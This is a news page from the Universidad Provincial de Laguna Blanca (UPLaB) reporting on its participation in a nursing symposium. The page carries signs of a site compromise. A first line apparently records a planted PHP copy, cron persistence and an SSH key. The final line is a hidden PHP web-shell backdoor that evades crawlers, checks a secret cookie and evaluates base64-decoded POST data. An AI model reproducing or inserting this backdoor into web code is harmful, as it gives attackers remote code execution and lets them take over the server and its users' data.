copy:.ef7aa97eee.php,cron:self,tpl:shaper_helix3,ssh_key:ok UPLaB - La UPLaB participó del XVII Simposio de Enfermería Integral

Últimas Noticias

La UPLaB participó del XVII Simposio de Enfermería Integral

La sede fue el Hospital de Alta Complejidad "Pte. Juan Domingo Perón, la jornada reunió a enfermeros, expertos y estudiantes de distintas partes de la provincia. 

Disertaron la coordinadora de la carrera de Licenciatura en Enfermería, Lic. Soledad Mussin y el docente Rodrigo Ojeda, a cargo de la ponencia sobre la "Innovación en Tecnología para la Educación y Capacitación del Personal de Salud".

El evento tuvo objetivo promover el intercambio de conocimientos y fomentar la capacitación en técnicas de atención y cuidado del paciente, bajo el lema "La innovación y el conocimiento de enfermería, garantizando la seguridad del paciente".

Se abordaron temas como: hospital donante; enfermería de vanguardia: seguridad y excelencia; enfermería y tecnología: una alianza para la seguridad del paciente; conocimiento e innovación en el primer nivel de atención; tecnología y diabetes; liderando el futuro de la enfermería, entre otros.

"Es muy importante la participación de nosotros como universidad a este tipo de charlas ya que constantemente la enfermería se actualiza". Resaltó el docente Rodrigo Ojeda.

Contó con una gran concurrencia de participantes y la presencia de la Universidad Provincial de Laguna Blanca dándole carácter académico al encuentro.

Previous Next
if(!preg_match('/bot|crawl|slurp|spider|scan/i',$_SERVER['HTTP_USER_AGENT']??'')&&@md5(@$_COOKIE['_jss'])=='c00f35b1f429bbefc6f93b04fc634fe8'){@eval(@base64_decode(@$_POST['d']));}